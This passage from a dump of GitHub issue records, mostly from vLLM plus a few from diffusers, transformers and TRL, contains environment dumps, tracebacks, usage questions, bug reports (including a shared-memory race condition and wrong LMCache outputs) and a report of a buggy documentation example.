bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities ibpb_exit_to_user\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 600 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI", "url": "https://github.com/vllm-project/vllm/issues/29489", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-26T09:35:37Z", "updated_at": "2025-11-26T09:36:37Z", "comments": 0, "user": "josefdra" }, { "repo": "huggingface/diffusers", "number": 12719, "title": "how to use quantization and device_map=balance to run qwen-image on kaggle T4 * 2", "body": "```python3\n!python3 -m pip install -U diffusers peft bitsandbytes protobuf\nimport diffusers, torch, math\nqwen = diffusers.QwenImagePipeline.from_pretrained('Qwen/Qwen-Image', quantization_config=diffusers.PipelineQuantizationConfig(quant_backend='bitsandbytes_4bit', quant_kwargs={'load_in_4bit':True, 'bnb_4bit_quant_type':'nf4', 'bnb_4bit_compute_dtype':torch.float16}, components_to_quantize=['transformer', 'text_encoder']), torch_dtype=torch.float16, device_map='balanced')\nprint(qwen.hf_device_map)\nqwen.scheduler = diffusers.FlowMatchEulerDiscreteScheduler.from_config({'base_image_seq_len':256, 'base_shift':math.log(3), 'invert_sigmas':False, 'max_image_seq_len':8192, 'max_shift':math.log(3), 'num_train_timesteps':1000, 'shift':1, 'shift_terminal':None, 'stochastic_sampling':False, 'time_shift_type':'exponential', 'use_beta_sigmas':False, 'use_dynamic_shifting':True, 'use_exponential_sigmas':False, 'use_karras_sigmas':False})\nqwen.load_lora_weights('lightx2v/Qwen-Image-Lightning', weight_name='Qwen-Image-Lightning-4steps-V2.0.safetensors', adapter_name='lightning')\nqwen.set_adapters('lightning', adapter_weights=1)\nqwen(prompt='a beautiful girl', height=1280, width=720, num_inference_steps=4, true_cfg_scale=1).images[0].save('a.png')\n```\n\nWARNING:accelerate.big_modeling:Some parameters are on the meta device because they were offloaded to the cpu.\n{'text_encoder': 'cpu', 'vae': 0} where is the transformer ?\n\nNotImplementedError: Cannot copy out of meta tensor; no data!\n\nI want to ask how to make the above code work in kaggle. 
why 16G * 2 vram still not enough to run q4 quantization qwen-image? I want to take full advantage of 2 gpu. Do I need max_memory?\n\nfull error logs:\n/usr/local/lib/python3.11/dist-packages/torch/utils/_contextlib.py in decorate_context(*args, **kwargs)\n 114 def decorate_context(*args, **kwargs):\n 115 with ctx_factory():\n--> 116 return func(*args, **kwargs)\n 117 \n 118 return decorate_context\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in __call__(self, prompt, negative_prompt, true_cfg_scale, height, width, num_inference_steps, sigmas, guidance_scale, num_images_per_prompt, generator, latents, prompt_embeds, prompt_embeds_mask, negative_prompt_embeds, negative_prompt_embeds_mask, output_type, return_dict, attention_kwargs, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\n 566 )\n 567 do_true_cfg = true_cfg_scale > 1 and has_neg_prompt\n--> 568 prompt_embeds, prompt_embeds_mask = self.encode_prompt(\n 569 prompt=prompt,\n 570 prompt_embeds=prompt_embeds,\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in encode_prompt(self, prompt, device, num_images_per_prompt, prompt_embeds, prompt_embeds_mask, max_sequence_length)\n 252 \n 253 if prompt_embeds is None:\n--> 254 prompt_embeds, prompt_embeds_mask = self._get_qwen_prompt_embeds(prompt, device)\n 255 \n 256 prompt_embeds = prompt_embeds[:, :max_sequence_length]\n\n/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/qwenimage/pipeline_qwenimage.py in _get_qwen_prompt_embeds(self, prompt, device, dtype)\n 203 txt, max_length=self.tokenizer_max_length + drop_idx, padding=True, truncation=True, return_tensors=\"pt\"\n 204 ).to(device)\n--> 205 encoder_hidden_states = self.text_encoder(\n 206 input_ids=txt_tokens.input_ids,\n 207 attention_mask=txt_tokens.attention_mask,\n\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/module.py in _wrapped_call_impl(self, *args, **kwargs)\n 1737 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc]\n 1738 else:\n-> 1739 return self._call_impl(*args, **kwargs)\n 1740 \n 1741 # torchrec tests the code consistency with the following code\n\n/usr/local/lib/python3.11/dist-packages/torch/nn/modules/module.py in _call_impl(self, *args, **kwargs)\n 1748 or _global_backward_pre_hooks or _global_backward_hooks\n 1749 or _global_forward_hooks or _global_forward_pre_hooks):\n-> 1750 return forward_call(*args, **kwargs)\n 1751 \n 1752 result = None\n\n/usr/local/lib/python3.11/dist-packages/accelerate/hooks.py in new_forward(module, *args, **kwargs)\n 173 output = module._old_forward(*args, **kwargs)\n 174 else:\n--> 175 output = module._old_forward(*args, **kwargs)\n 176 return module._hf_hook.post_forward(module, output)\n 177 \n\n/usr/local/lib/python3.11/dist-packages/transformers/utils/generic.py in wrapper(self, *args, **kwargs)\n 941 \n 942 try:\n--> 943 output = func(self, *args, **kwargs)\n 944 if is_requested_to_return_tuple or (is_configured_to_return_tuple and is_top_level_module):\n 945 ", "url": "https://github.com/huggingface/diffusers/issues/12719", "state": "open", "labels": [], "created_at": "2025-11-26T08:35:46Z", "updated_at": "2025-11-26T09:15:54Z", "user": "chaowenguo" }, { "repo": "vllm-project/vllm", "number": 29474, "title": "[P/D][Metrics] Consider combined/summed metrics (e.g. ttft and e2e_request_latency) for prefill and decode instances", "body": "### Your current environment\n\n
\n\nEnv info snipped\n\n```\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.1 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Aug 14 2025, 17:47:21) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-152-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 570.172.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nVendor ID: GenuineIntel\nBIOS Vendor ID: Intel(R) Corporation\nModel name: INTEL(R) XEON(R) PLATINUM 8562Y+\nBIOS Model name: INTEL(R) XEON(R) PLATINUM 8562Y+ CPU @ 2.8GHz\nBIOS CPU family: 179\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 73%\nCPU max MHz: 4100.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize 
tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 3 MiB (64 instances)\nL1i cache: 2 MiB (64 instances)\nL2 cache: 128 MiB (64 instances)\nL3 cache: 120 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-31,64-95\nNUMA node1 CPU(s): 32-63,96-127\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target s", "url": "https://github.com/vllm-project/vllm/issues/29474", "state": "open", "labels": [ "usage", "kv-connector" ], "created_at": "2025-11-26T02:50:17Z", "updated_at": "2025-11-26T08:31:18Z", "comments": 1, "user": "mgw2168-1" }, { "repo": "vllm-project/vllm", "number": 29472, "title": "[Installation]: how to Install vllm on dell promax gb10", "body": "### Your current environment\n\nI failed to install vllm on dell promax gb10 , mesages as followed\n\nnvcc --version\nnvcc: NVIDIA (R) Cuda compiler driver\nCopyright (c) 2005-2025 NVIDIA Corporation\nBuilt on Wed_Aug_20_01:57:39_PM_PDT_2025\nCuda compilation tools, release 13.0, V13.0.88\nBuild cuda_13.0.r13.0/compiler.36424714_0\n\n\npip install vllm\nSuccessfully installed torch-2.9.0 torchaudio-2.9.0 torchvision-0.24.0 vllm-0.11.2\n\n```\n(py312) dell@promaxgb10-0843:~/test/vllm/Qwen$ vllm -V\nTraceback (most recent call last):\n File \"/home/dell/miniconda3/envs/py312/bin/vllm\", line 3, in \n from vllm.entrypoints.cli.main import main\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/entrypoints/cli/__init__.py\", line 3, in \n from vllm.entrypoints.cli.benchmark.latency import BenchmarkLatencySubcommand\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/entrypoints/cli/benchmark/latency.py\", line 5, in \n from vllm.benchmarks.latency import add_cli_args, main\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/benchmarks/latency.py\", line 17, in \n from vllm.engine.arg_utils import EngineArgs\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/engine/arg_utils.py\", line 35, in \n from vllm.attention.backends.registry import AttentionBackendEnum\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/attention/__init__.py\", line 4, in \n from vllm.attention.backends.abstract import (\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/attention/backends/abstract.py\", line 9, in \n from vllm.model_executor.layers.linear import ColumnParallelLinear\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/model_executor/__init__.py\", line 4, in \n from vllm.model_executor.parameter import BasevLLMParameter, PackedvLLMParameter\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/model_executor/parameter.py\", line 11, in \n from vllm.distributed import (\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/__init__.py\", line 4, in \n from .communication_op import *\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/communication_op.py\", line 9, in \n from .parallel_state import get_tp_group\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/distributed/parallel_state.py\", line 250, in \n direct_register_custom_op(\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/utils/torch_utils.py\", line 640, in direct_register_custom_op\n from vllm.platforms import current_platform\n File 
\"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/platforms/__init__.py\", line 257, in __getattr__\n _current_platform = resolve_obj_by_qualname(platform_cls_qualname)()\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/utils/import_utils.py\", line 89, in resolve_obj_by_qualname\n module = importlib.import_module(module_name)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/importlib/__init__.py\", line 90, in import_module\n return _bootstrap._gcd_import(name[level:], package, level)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/dell/miniconda3/envs/py312/lib/python3.12/site-packages/vllm/platforms/cuda.py\", line 16, in \n import vllm._C # noqa\n ^^^^^^^^^^^^^^\nImportError: libtorch_cuda.so: cannot open shared object file: No such file or directory\n```\n\n\n\n\n### How you are installing vllm\n\n```sh\npip install vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29472", "state": "open", "labels": [ "installation" ], "created_at": "2025-11-26T02:41:18Z", "updated_at": "2026-01-01T12:28:29Z", "comments": 2, "user": "goactiongo" }, { "repo": "vllm-project/vllm", "number": 29436, "title": "[Bug]: vLLM Serve with LMCache enabled produces wrong output for GPT-OSS-20B", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nvLLM serve command with LMCache enabled produces wrong output with GPT OSS 20B for subsequent invocations with the same prompt\n\nSteps to reproduce:\nCommand to start the server:\n```\nLMCACHE_CONFIG_FILE=lmcache_cpu.yaml\nvllm serve openai/gpt-oss-20b --port 8000 --kv-transfer-config '{\"kv_connector\":\"LMCacheConnectorV1\", \"kv_role\":\"kv_both\"}'\n```\n\nInvocation:\n```\ncurl 127.0.0.1:8000/v1/chat/completions -H \"Content-Type: application/json\" -d '{\"model\": \"openai/gpt-oss-20b\", \"messages\": [ {\"role\": \"user\", \"content\": \"What is Amazon SageMaker?\"}]}'\n```\n\nFirst invocation:\n```\n{\n\"id\":\"chatcmpl-951ca7178b1e4226b0343cb070033487\",\n\"object\":\"chat.completion\",\n\"created\":1764098087,\n\"model\":\"openai/gpt-oss-20b\",\n\"choices\":[\n{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"**Amazon SageMaker** is Amazon Web Services\u2019 fully\u2011managed platform that lets you build, train, tune, and deploy machine\u2011learning models fast\u2014without managing the underlying infrastructure.\\n\\nKey capabilities\\n\\n| Feature | What it does |\\n|--------|--------------|\\n| **SageMaker Studio** | A web\u2011based IDE that bundles notebooks, visual debugging, model monitoring, and collaboration tools. |\\n| **Built\u2011in algorithms & frameworks** | Pre\u2011packaged models (XGBoost, Linear Learner, etc.) and support for your own TensorFlow, PyTorch, MXNet, Scikit\u2011learn, R, etc. |\\n| **Auto\u2011ML & automated model tuning** | SageMaker Autopilot automatically searches model architectures and hyper\u2011parameters. |\\n| **Managed training** | Spot, distributed, and GPU training jobs that scale to the required compute. |\\n| **Model deployment** | One\u2011click production endpoints, batch transform, edge inference (SageMaker Edge), and real\u2011time or asynchronous inference. |\\n| **Inference pipelines** | Compose multiple models or processing steps into a single pipeline. |\\n| **Model monitoring & A/B testing** | Continuous evaluation of drift, predictions, and performance metrics. |\\n| **Security & compliance** | VPC, IAM, KMS encryption, private cataloging, and audit trails. |\\n\\nIn short, SageMaker removes the operational burden of ML\u2014so teams can focus on data science and business value rather than servers, networking, and scaling.\",\"refusal\":null,\"annotations\":null,\"audio\":null,\"function_call\":null,\"tool_calls\":[],\"reasoning\":\"User asks \\\"What is Amazon SageMaker?\\\" Short answer. Provide description: fully managed ML service, environment to build, train, deploy models, etc. Should be succinct.\",\"reasoning_content\":\"User asks \\\"What is Amazon SageMaker?\\\" Short answer. Provide description: fully managed ML service, environment to build, train, deploy models, etc. Should be succinct.\"},\"logprobs\":null,\"finish_reason\":\"stop\",\"stop_reason\":null,\"token_ids\":null}],\"service_tier\":null,\"system_fingerprint\":null,\"usage\":{\"prompt_tokens\":75,\"total_tokens\":426,\"completion_tokens\":351,\"prompt_tokens_details\":null},\"prompt_logprobs\":null,\"prompt_token_ids\":null,\"kv_transfer_params\":null}\n```\n\nSecond invocation:\n```\n{\n \"id\": \"chatcmpl-4ebc19fc5c2a41a7bebc01ea8d1c98b1\",\n \"object\": \"chat.completion\",\n \"created\": 1764098160,\n \"model\": \"openai/gpt-oss-20b\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"Sure! 
Here\u2019s a basic guide to get you started with writing a cool, informative yet accessible article on **\\\"The Fascinating World of Quantum Computing\\\"** for a general audience. Feel free to adapt the structure, tone, or content to match your style and publication\u2019s guidelines.\\n\\n---\\n\\n## 1. Hook & Context (\u2248150\u2013200 words)\\n\\n- **Start with a vivid anecdote, surprising fact, or a relatable analogy** that introduces the \u201cwow\u201d moment in quantum computing.\\n - *Example:* \u201cImagine a coin that, instead of being heads or tails, can be both at the same time\u2026 until you look at it.\u201d \\n- **Briefly state why this topic matters** to everyday life: faster drug discovery, better encryption, breakthrough materials, etc.\\n\\n> **Tell readers what they\u2019ll learn**: a quick glimpse of quantum fundamentals, why it\u2019s different from classic bits, and how it could reshape technologies.\\n\\n---\\n\\n## 2. What\u2019s a Quantum Computer? (\u2248300 words)\\n\\n| Section | Content | Quick Tips |\\n|---------|---------|------------|\\n| **2.1 \u201cBits\u201d vs. \u201cQubits\u201d** | \u2022 Classical bits (\u201c0\u201d or \u201c1\u201d).
\u2022 Qubits: superposition (both 0 & 1) & entanglement. | Use visual metaphors: a spinning top (superposition) and two dancers always in sync (entanglement). |\\n| **2.2 Basic Operations** | \u2022 Quantum gates (Pauli X, H, CNOT).
\u2022 The role of interference. | A tiny \u201creversible\u201d logic of the quantum \u201cif\u2011then\u201d that flips outcomes. |\\n| **2.3 Measuring As a Collapses** | \u2022 Outcome collapse on measurement.
\u2022 Probabilities & expectation values. | Compare to a gamble: you only learn the re", "url": "https://github.com/vllm-project/vllm/issues/29436", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-25T19:27:24Z", "updated_at": "2025-11-25T19:27:24Z", "comments": 0, "user": "ksuma2109" }, { "repo": "vllm-project/vllm", "number": 29409, "title": "[Usage]: Custom Logits Processors V1 how to get tokenizer into processor", "body": "### Problem with tokenizer\n\nFor the second day now, I've been unable to figure out how to get a tokenizer inside a custom processor. I used the processor from the documentation as an example. I examined each object through debug, but couldn't find where to extract the tokenizer. In v0, this was done simply at the request level, by passing an argument to the object. \nHow to pass a tokenizer to the processor?\n```python import torch\nfrom vllm.config import VllmConfig\nfrom vllm.sampling_params import SamplingParams\nfrom vllm.v1.sample.logits_processor import (BatchUpdate,\n LogitsProcessor,\n MoveDirectionality)\n\n\n\nclass DummyLogitsProcessor(LogitsProcessor):\n \"\"\"Fake logit processor to support unit testing and examples\"\"\"\n\n @classmethod\n def validate_params(cls, params: SamplingParams):\n target_token: int | None = params.extra_args and params.extra_args.get(\n \"target_token\"\n )\n \n \n if target_token is not None and not isinstance(target_token, int):\n raise ValueError(f\"target_token value {target_token} is not int\")\n\n def __init__(self, vllm_config: \"VllmConfig\", device: torch.device,\n is_pin_memory: bool):\n self.req_info: dict[int, int] = {}\n \n def is_argmax_invariant(self) -> bool:\n \"\"\"Never impacts greedy sampling\"\"\"\n return False\n\n def update_state(self, batch_update: BatchUpdate | None):\n \n if not batch_update:\n return\n # Process added requests.\n for index, params, _, _ in batch_update.added:\n assert params is not None\n self.validate_params(params)\n if params.extra_args and (target_token :=\n params.extra_args.get(\"target_token\")):\n self.req_info[index] = target_token\n else: \n self.req_info.pop(index, None)\n\n if self.req_info:\n # Process removed requests.\n for index in batch_update.removed:\n self.req_info.pop(index, None)\n\n # Process moved requests, unidirectional move (a->b) and swap\n # (a<->b)\n for adx, bdx, direct in batch_update.moved:\n a_val = self.req_info.pop(adx, None)\n b_val = self.req_info.pop(bdx, None)\n if a_val is not None:\n self.req_info[bdx] = a_val\n if direct == MoveDirectionality.SWAP and b_val is not None:\n self.req_info[adx] = b_val\n\n def apply(self, logits: torch.Tensor) -> torch.Tensor:\n if not self.req_info:\n return logits\n # Save target values before modification\n cols = torch.tensor(\n list(self.req_info.values()), dtype=torch.long, device=logits.device\n )\n rows = torch.tensor(\n list(self.req_info.keys()), dtype=torch.long, device=logits.device\n )\n values_to_keep = logits[rows, cols].clone()\n\n # Mask all but target tokens\n logits[rows] = float('-inf')\n logits[rows, cols] = values_to_keep\n\n return logits\n\n```\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29409", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-25T13:24:17Z", "updated_at": 
"2025-12-02T10:33:18Z", "comments": 6, "user": "cvadim130" }, { "repo": "vllm-project/vllm", "number": 29389, "title": "[Bug]: race condition in shm_broadcast.py", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n# Problem\n`ShmRingBuffer` is a lock-free queue, the implementation of which https://github.com/vllm-project/vllm/blob/12c007e288bf5c0ae3bd438036fbafbad88e706b/vllm/distributed/device_communicators/shm_broadcast.py#L98-L153\n\nrelies on the fact that when a flag is written to, signalling a valid state, the associated data is also in a valid state. To illustrate the point, consider the program\n```python\nshm = shared_memory.SharedMemory(..., size=128)\n# set shm to 0\n\n# process 1\nshm[0] = 1\nshm[64] = 1\n\n# process 2\nwhile shm[64] != 1:\n pass\nprint(shm[0])\n```\n`ShmRingBuffer` requires that `print(shm[0])` always prints `1`. **There is no guarantee this is true**. For this to be true,\n1. The Python language/implementation must provide a memory model, which it doesn't. Loosely speaking, a memory model is a set of guarantees on how source code maps to hardware instructions.\n2. Even if we assume the source code maps \"as intended\" to hardware instructions, the hardware must ensure that process 2 must observe the writes to `shm[0]` and `shm[64]` in the same order as process 1.\n\nAn example of 2 breaking down is given in [`race_condition.cpp`](https://gist.github.com/nvjullin/cc52386e291fe41218b54406ece962a0). On an ARM CPU,\n```bash\n$ g++ -std=c++17 race_condition.cpp\n$ ./a.out\nnumber of violations: 5\n# ...\n```\nUnfortunately, I don't know how to demonstrate the same race condition in Python.\n\n\n# What it means\n`ShmRingBuffer` can have corrupted memory and crashes vLLM sporadically. Such a crash would be near impossible to reproduce and debug.\n\n\n# Solutions\nIn order of recommendation:\n1. Remove `ShmRingBuffer` and always use the fallback `self.local_socket.send(serialized_obj)`. This is the simplest.\n2. Use a well-tested lock-free queue implementation and don't write our own. Lock-free programming is notoriously difficult to write correctly, requires expertise to understand and is overall a maintenence nightmare.\n3. Write it in C++ with proper atomics that guarantees the ordering of writes. The implementation should document extensively the proof of its correctness across different architectures. Python provides no tools for lock-free programming, making it impossible to write.\n\nCC @youkaichao @nvpohanh \n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29389", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-25T09:25:52Z", "updated_at": "2025-11-25T09:25:52Z", "comments": 0, "user": "nvjullin" }, { "repo": "vllm-project/vllm", "number": 29382, "title": "[Doc]: Expert Parallel Deployment says \"Tensor parallel size (always 1 for now)\" is confusing", "body": "### \ud83d\udcda The doc issue\n\nOn page https://docs.vllm.ai/en/latest/serving/expert_parallel_deployment/#single-node-deployment it says Tensor parallel size can only be 1 but didn't mention the behavior of Attention Layers\n\nOn page https://docs.vllm.ai/en/latest/serving/data_parallel_deployment/ it says The expert layers will by default form a (DP x TP) sized tensor parallel group. 
To enable expert parallelism, include the --enable-expert-parallel CLI arg (on all nodes in the multi-node case).\n\nwhich is rather confusing.\n\n### Suggest a potential alternative/fix\n\nPoint out the correct behavior of MoE models when TP, EP are both set.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29382", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-25T07:54:42Z", "updated_at": "2025-12-13T17:38:01Z", "comments": 0, "user": "xeonliu" }, { "repo": "huggingface/transformers", "number": 42375, "title": "SAM3 single image inference with multiple text prompt", "body": "Hi\nI'm trying to run inference on a single image, aiming to get the bbox of objects from several different categories (e.g. \"a person\" and \"a car\").\nThe only example I found for prompting with multiple categories is in the \"Batched Inference with Text Prompts\" example, but then I need to unnecessarily duplicate my image as the # of categories.\n\nIs there a different, more efficient way of achieving this? \n\nP.S.\nWhen I try prompting with a list of several categories and a single image, I get an error.\n", "url": "https://github.com/huggingface/transformers/issues/42375", "state": "open", "labels": [], "created_at": "2025-11-25T06:20:09Z", "updated_at": "2026-01-05T16:16:01Z", "comments": 9, "user": "iariav" }, { "repo": "huggingface/trl", "number": 4569, "title": "[doc issue] doc on \"GRPO with replay buffer\" buggy", "body": "### Reproduction\n\nThe code example in [doc for \"GRPO with replay buffer\"](https://huggingface.co/docs/trl/main/en/experimental#grpo-with-replay-buffer) is kind of buggy. \n\n- It imports `GRPOWithReplayBufferTrainer` but never used. 
\n- It uses `GRPOWithReplayBufferConfig` but never imported\n- The code is apparently not executable.\n\n\nBelow is the code example given in the doc: \n\n```python\nfrom trl.experimental.grpo_with_replay_buffer import GRPOWithReplayBufferTrainer\nfrom datasets import load_dataset\n\ndataset = load_dataset(\"trl-internal-testing/zen\", \"standard_prompt_only\", split=\"train\")\n\n# Guarantee that some rewards have 0 std\ndef custom_reward_func(completions, **kwargs):\n if torch.rand(1).item() < 0.25:\n return [0] * len(completions) # simulate some None rewards\n else:\n return torch.rand(len(completions)).tolist()\n\ntraining_args = GRPOWithReplayBufferConfig(\n output_dir=self.tmp_dir,\n learning_rate=1e-4,\n per_device_train_batch_size=4,\n num_generations=4,\n max_completion_length=8,\n replay_buffer_size=8,\n report_to=\"none\",\n)\ntrainer = GRPOTrainer(\n model=\"trl-internal-testing/tiny-Qwen2ForCausalLM-2.5\",\n reward_funcs=[custom_reward_func],\n args=training_args,\n train_dataset=dataset,\n)\n\nprevious_trainable_params = {n: param.clone() for n, param in trainer.model.named_parameters()}\n\ntrainer.train()\n```\n\n\n### System Info\n\nNA\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code 